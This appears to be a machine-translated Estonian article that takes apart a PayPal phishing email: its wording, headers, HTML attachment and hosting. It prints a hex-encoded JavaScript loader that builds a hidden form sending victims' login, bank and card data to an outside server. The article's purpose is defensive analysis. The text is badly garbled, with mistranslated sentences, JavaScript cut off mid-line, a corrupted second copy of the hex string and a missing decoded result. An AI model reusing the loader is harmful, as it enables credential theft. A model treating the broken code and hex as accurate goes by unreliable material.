Online-turvalisus Andmepüügisõnumi anatoomia katkestamine

Tänapäeva maailmas, kus igaühe teave on võrgus, on andmepüük üks populaarsemaid ja laastavamaid võrgurünnakuid, sest võite alati viirust puhastada, aga kui teie pangandusteave on varastatud, siis olete hädas. Siin on üks selline rünnak, mille saime.

Ärge arvake, et see on oluline ainult teie pangandusteave: kui keegi saab oma konto sisselogimise üle kontrolli, siis nad ei tea mitte ainult selles kontos sisalduvat teavet, kuid tõenäosus on, et sama sisselogimisteavet võib kasutada ka teistes kontosid. Ja kui nad teie e-posti kontot kahjustavad, saavad nad kõik teised paroolid lähtestada.

Nii et lisaks paroolide hoidmisele, mis on tugev ja vaheldusrikas, peate alati vaatama, et tegelikud asjad on maskeerunud. Kuigi enamik andmepüügi katseid on amatöörne, on mõned üsna veenvad, mistõttu on oluline mõista, kuidas neid pinnatasandil ära tunda ja kuidas nad kapoti all töötavad..

Pilt asirap

Uurimine, mis on tavalise vaatega

Meie e-posti näide, nagu enamik andmepüügi katseid, „teavitab teid“ oma PayPali kontol toimuvast tegevusest, mis normaalsetes tingimustes oleks murettekitav. Seega on üleskutse oma kontot kontrollida / taastada, esitades peaaegu iga isikliku teabe, mida saate mõelda. Jällegi, see on päris vormiline.

Kuigi seal on kindlasti ka erandeid, laaditakse iga sõnumite ja pettuste e-kirjad ise sõnumisse otse punaste lippudega. Isegi kui tekst on veenev, võite tavaliselt leida palju sõnumikeha täis vead, mis näitavad, et sõnum ei ole legitiimne.

Sõnumikeha

Esmapilgul on see üks paremaid andmepüügi kirju, mida olen näinud. Ei ole õigekirja- ega grammatilisi vigu ning verbiage loeb vastavalt sellele, mida võid oodata. Siiski on mõned punased lipud, mida näete, kui sisu veidi lähemalt uurite.

• “Paypal” - õige juhtum on “PayPal” (kapital P). Näete, et sõnumis kasutatakse mõlemat varianti. Ettevõtted on oma kaubamärgiga väga tahtlikud, mistõttu on kaheldav, et see läbiks tõestusprotsessi.
• „Lubage ActiveX-il” - Mitu korda olete näinud legitiimset veebipõhist ettevõtet, mille suurus on Paypalil, ja kasutab omaenda komponenti, mis töötab ainult ühel brauseril, eriti kui nad toetavad mitut brauserit? Muidugi, kusagil seal on mõni firma, kuid see on punane lipp.
• “Ohutult.” - Märge, kuidas see sõna ei jää rida ülejäänud lõigu tekstiga. Isegi kui ma akna natuke rohkem venitan, siis see ei murdu ega ruumi õigesti.
• „Paypal!” - ruum enne hüüumärki tundub ebamugav. Lihtsalt teine ​​vikerkaar, mis ma olen kindel, ei oleks legitiimne e-post.
• „PayPal-Account Update Form.pdf.htm” - Miks peaks Paypal lisama „PDF”, eriti kui nad võiksid lihtsalt linkida oma saidi lehele? Lisaks sellele, miks nad üritaksid varjata HTML-faili PDF-failina? See on nende kõigi suurim punane lipp.

Sõnumi päis

Kui vaatate sõnumi päist, ilmuvad paar rohkem punast lippu:

• Aadress on [email protected].
• Puudub aadress. Ma seda ei tühjendanud, see ei ole lihtsalt tavalise sõnumi päise osa. Tavaliselt isikupärastab teie nime omav ettevõte teie e-posti.

Manus

Manuse avamisel saate kohe näha, et paigutus ei ole õige, kuna see puudutab stiiliteavet. Jällegi, miks peaks PayPal saatma HTML-vormi, kui nad saaksid oma saidil lihtsalt lingi anda?

Märge: Selleks kasutasime selle jaoks Gmaili sisseehitatud HTML-liidese vaatajat, kuid soovitame ÄRGE OPENI lisasid scammers'ist. Mitte kunagi. Kunagi. Nad sisaldavad väga sageli ära rakendusi, mis installivad teie arvutisse troojalased, et varastada teie konto andmed.

Natuke rohkem sirvides näete, et see vorm küsib mitte ainult meie PayPali sisselogimisandmeid, vaid ka pangandus- ja krediitkaardi andmeid. Mõned pildid on katki.

On ilmne, et see andmepüügi katse läheb kõigest ühe käega.

Tehniline jaotus

Kuigi see peaks olema päris selge, kui see on selgelt nähtav, et see on andmepüügi katse, siis me nüüd jaotame e-posti tehnilise koostise ja vaatame, mida me leiame.

Teave lisast

Esimene asi, mida vaadata, on manusevormi HTML-allikas, mis edastab andmed võltsile.

Allika kiirel vaatamisel ilmuvad kõik lingid kehtivateks, kui nad osutavad kas „paypal.com” või „paypalobjects.com”, mis on mõlemad õigustatud.

Nüüd vaatame mõned põhilised lehekülje andmed Firefox kogub lehel.

Nagu näete, tõmmatakse osa graafikast „PayPal.com”, “goodhealthpharmacy.com” ja “pic-upload.de” domeenide asemel domeenide „blessedtobe.com“ asemel.

Teave e-posti päistest

Järgmisena vaatleme toores e-kirjade päiseid. Gmail teeb selle kättesaadavaks teate menüüvaliku Näita originaali kaudu.

Vaadates algse sõnumi päisteavet, näete seda sõnumit Outlook Expressi 6 abil. Ma kahtlen, et PayPalil on töötajad, kes saadavad kõik need sõnumid käsitsi läbi aegunud e-posti kliendi.

Nüüd, vaadates marsruutimisinfot, näeme nii saatja kui ka edastava posti serveri IP-aadressi.

„Kasutaja” IP-aadress on algne saatja. IP-infot kiiresti otsides näeme, et IP-aadress on Saksamaal.

Ja kui me vaatame edasisaatva posti serveri (mail.itak.at), näeme IP-aadressi, et see on Austrias asuv Interneti-teenuse pakkuja. Ma kahtlen, et PayPal suunab oma e-kirju otse Austria Interneti-teenuse pakkuja kaudu, kui neil on massiivne serverimaja, mis suudab seda ülesannet hõlpsasti käsitseda.

Kus andmed lähevad?

Seega oleme selgelt kindlaks teinud, et tegemist on andmepüügiga, ning kogusime teavet selle kohta, kust sõnum pärineb, kuid mis on, kuhu teie andmed saadetakse?

Selle nägemiseks peame kõigepealt salvestama HTM-i manuse, mis on meie töölaual ja avatud tekstiredaktoris. Selle läbi kerimine näib olevat korras, välja arvatud juhul, kui jõuame kahtlaselt otsitava Javascripti plokki.

Me näeme, et viimane Javascript-i ploki täielik allikas on:

// Copyright © 2005 Voormedia - WWW.VOORMEDIA.COM
var i, y, x = "3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e"; y = "; for (i = 0; i

Iga kord, kui näete suurt jumbled string näiliselt juhuslikult tähti ja numbreid sisseehitatud Javascript plokk, see on tavaliselt midagi kahtlast. Koodi vaadates on muutuja „x” seatud sellele suurele stringile ja seejärel dekodeeritakse muutujaks „y”. Muutuja “y” lõpptulemus kirjutatakse seejärel dokumendile HTML-vormingus.

Kuna suur string on valmistatud numbritest 0-9 ja tähed a-f, siis kodeeritakse see tõenäoliselt lihtsa ASCII-Hex konversiooni kaudu:

3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726666174612f766572696676e660626276f646174612f7665726966792e706870223

Tõlgib:

See ei ole kokkusattumus, et see dekodeerib kehtiva HTML-vormi sildi, mis saadab tulemused mitte PayPalile, vaid petturitele.

Lisaks näete vormi HTML-allika vaatamisel, et selle vormi silt ei ole nähtav, kuna see genereeritakse dünaamiliselt Javascripti kaudu. See on tark viis varjata HTML-i tegelikku toimimist, kui keegi lihtsalt vaatab manustatud allika allikat (nagu me tegime varem), mitte selle lisamisega otse tekstiredaktorisse.

Kiiresti sattunud saidi jooksmisega näeme, et see on populaarne veebihost, mis on 1 ja 1..

See, mis paistab, on domeenis kasutatav loetav nimi (erinevalt „dfh3sjhskjhw.net” -le) ja domeen on registreeritud 4 aastat. Sellepärast usun, et see domeen oli kaaperdatud ja kasutatud selle andmepüügi katses.

Küünilisus on hea kaitse

Kui tegemist on turvalisuse säilitamisega võrgus, ei ole kunagi valus küünilisus.

Kuigi ma olen kindel, et näite e-kirjas on rohkem punaseid lippu, on see, mida me eespool mainisime, indikaatorid, mida näeme pärast vaid mõneminutilist uurimist. Hüpoteetiliselt, kui e-posti pinna tase matkis oma õigustatud vastast 100%, näitab tehniline analüüs siiski selle tõelist olemust. See on põhjus, miks see impordib, et oleks võimalik uurida nii seda, mida saate ja mida ei saa näha.